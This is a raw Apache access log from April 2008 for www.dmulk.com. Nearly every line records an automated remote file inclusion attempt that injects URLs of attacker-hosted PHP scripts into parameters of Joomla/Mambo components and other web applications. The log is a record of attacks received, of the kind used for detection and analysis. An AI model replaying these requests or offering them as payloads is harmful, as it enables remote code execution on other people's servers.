222.122.47.228 - - [07/Apr/2008:12:47:56 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:47:57 -0700] "GET /logs/access_080324.log//?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:48:00 -0700] "GET //?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:48:01 -0700] "GET /logs//?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 200 42127 "-" "libwww-perl/5.79" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:48:14 -0700] "GET /logs/access_080216.log/main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:48:15 -0700] "GET /logs/access_080216.log/main.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:48:15 -0700] "GET /logs/main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:48:15 -0700] "GET /logs/main.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:12:48:53 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:12:48:53 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:12:48:53 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:12:48:54 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:12:49:01 -0700] "GET /logs/access_080207.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:12:49:02 -0700] "GET /logs/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.74.65.15 - - [07/Apr/2008:12:49:03 -0700] "GET /logs/access_071230.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:49:21 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:49:22 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [07/Apr/2008:12:49:22 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.218.85.18 - - [07/Apr/2008:12:49:38 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [07/Apr/2008:12:49:38 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [07/Apr/2008:12:49:39 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:49:59 -0700] "GET /logs/access_080309.log//?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.47.228 - - [07/Apr/2008:12:50:02 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:12:51:14 -0700] "GET /logs/access_080329.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:12:51:14 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:12:51:14 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [07/Apr/2008:12:51:29 -0700] "GET /convert/mvcw.php?vwar_root=http://h1.ripway.com/h4dy/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [07/Apr/2008:12:51:31 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://h1.ripway.com/h4dy/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.7.82 - - [07/Apr/2008:12:51:31 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://h1.ripway.com/h4dy/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.72.191.2 - - [07/Apr/2008:12:51:56 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.72.191.2 - - [07/Apr/2008:12:51:56 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.72.191.2 - - [07/Apr/2008:12:51:57 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:12:52:00 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:12:52:01 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:12:52:01 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.61.30.100 - - [07/Apr/2008:12:52:21 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [07/Apr/2008:12:52:21 -0700] "GET /include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [07/Apr/2008:12:52:22 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:52:56 -0700] "GET /logs/access_080207.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:52:56 -0700] "GET /logs/access_080207.log/index1.php?choix=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:52:56 -0700] "GET /logs/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:52:57 -0700] "GET /logs/index1.php?choix=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:12:53:51 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:12:53:52 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.240.211.107 - - [07/Apr/2008:12:53:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:54:02 -0700] "GET /logs/access_080128.log/index1.php?choix=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:12:54:03 -0700] "GET /logs/access_080128.log/index1.php?choix=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:12:54:08 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:12:54:09 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 200 4139 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.101.95.197 - - [07/Apr/2008:12:54:25 -0700] "GET /logs/access_080223.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.95.197 - - [07/Apr/2008:12:54:26 -0700] "GET /logs//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:12:54:58 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:12:54:58 -0700] "GET //config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.162.238.35 - - [07/Apr/2008:12:54:58 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.95.197 - - [07/Apr/2008:12:55:03 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:12:55:34 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:12:55:35 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [07/Apr/2008:12:57:16 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.hddshare.com/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:12:57:18 -0700] "GET /logs/access_080108.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.38.50.24 - - [07/Apr/2008:12:57:40 -0700] "GET /logs/access.log/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [07/Apr/2008:12:57:40 -0700] "GET /@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [07/Apr/2008:12:57:41 -0700] "GET /logs/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:59:06 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:59:06 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:12:59:07 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.38.50.24 - - [07/Apr/2008:12:59:14 -0700] "GET /logs/access_080312.log/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.106.67 - - [07/Apr/2008:12:59:40 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.158.35 - - [07/Apr/2008:13:00:06 -0700] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.35 - - [07/Apr/2008:13:00:11 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.35 - - [07/Apr/2008:13:00:14 -0700] "GET /logs/access_071202.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.127 - - [07/Apr/2008:13:00:44 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [07/Apr/2008:13:01:13 -0700] "GET /logs/access_080312.log/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [07/Apr/2008:13:01:13 -0700] "GET /@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [07/Apr/2008:13:01:14 -0700] "GET /logs/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:13:01:29 -0700] "GET /logs/access.log//trans/trans.php?trans=&p=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:13:01:29 -0700] "GET //trans/trans.php?trans=&p=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.48.204.130 - - [07/Apr/2008:13:01:30 -0700] "GET /logs//trans/trans.php?trans=&p=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:01:56 -0700] "GET /logs/access_080329.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:01:56 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:01:58 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:13:02:13 -0700] "GET /logs/access.log/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:13:02:14 -0700] "GET /@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:13:02:15 -0700] "GET /logs/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.158.35 - - [07/Apr/2008:13:03:19 -0700] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.35 - - [07/Apr/2008:13:03:20 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.35 - - [07/Apr/2008:13:03:50 -0700] "GET /logs/access_071216.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.205.178.120 - - [07/Apr/2008:13:04:06 -0700] "GET /logs/access_080312.log/@rfihttp://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.10.128.138 - - [07/Apr/2008:13:04:40 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.211.165.72 - - [07/Apr/2008:13:04:42 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.misolve.com/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.7.198.112 - - [07/Apr/2008:13:05:14 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.suttas.com/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.252.17.105 - - [07/Apr/2008:13:05:22 -0700] "GET /logs/access.log/@rfihttp://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.88 - - [07/Apr/2008:13:05:26 -0700] "GET /plans/?N=D HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:06:21 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:06:21 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:06:22 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [07/Apr/2008:13:06:27 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:13:07:18 -0700] "GET /%22PHP/includes/header.inc.php?root=%22http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:13:07:19 -0700] "GET /logs/%22PHP/includes/header.inc.php?root=%22http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.145.232.237 - - [07/Apr/2008:13:08:08 -0700] "GET //config/dbutil.bck.php?confdir=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.145.232.237 - - [07/Apr/2008:13:08:08 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:13:08:39 -0700] "GET //errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.142.223.177 - - [07/Apr/2008:13:09:23 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.223.177 - - [07/Apr/2008:13:09:24 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:13:09:27 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:13:09:32 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
213.211.165.72 - - [07/Apr/2008:13:09:52 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.misolve.com/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
213.211.165.72 - - [07/Apr/2008:13:09:53 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.misolve.com/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:13:09:55 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
72.5.54.87 - - [07/Apr/2008:13:09:55 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:13:10:54 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.211.165.72 - - [07/Apr/2008:13:11:06 -0700] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.misolve.com/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.15.14.46 - - [07/Apr/2008:13:11:44 -0700] "GET /view.php?table=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.14.46 - - [07/Apr/2008:13:11:45 -0700] "GET /logs/view.php?table=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:13:12:46 -0700] "GET /logs/ashnews.php?pathtoashnews=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
74.53.73.178 - - [07/Apr/2008:13:12:46 -0700] "GET /ashnews.php?pathtoashnews=http://theninjalegion.com/etc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
209.126.144.75 - - [07/Apr/2008:13:13:17 -0700] "GET /clmcpreload.php?CLPATH=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.126.144.75 - - [07/Apr/2008:13:13:17 -0700] "GET /logs/clmcpreload.php?CLPATH=http://kaizo.hut2.ru/new/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.93.48.162 - - [07/Apr/2008:13:13:29 -0700] "GET /logs/access_071227.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [07/Apr/2008:13:13:29 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [07/Apr/2008:13:13:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [07/Apr/2008:13:13:29 -0700] "GET /logs/access_080306.log/modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
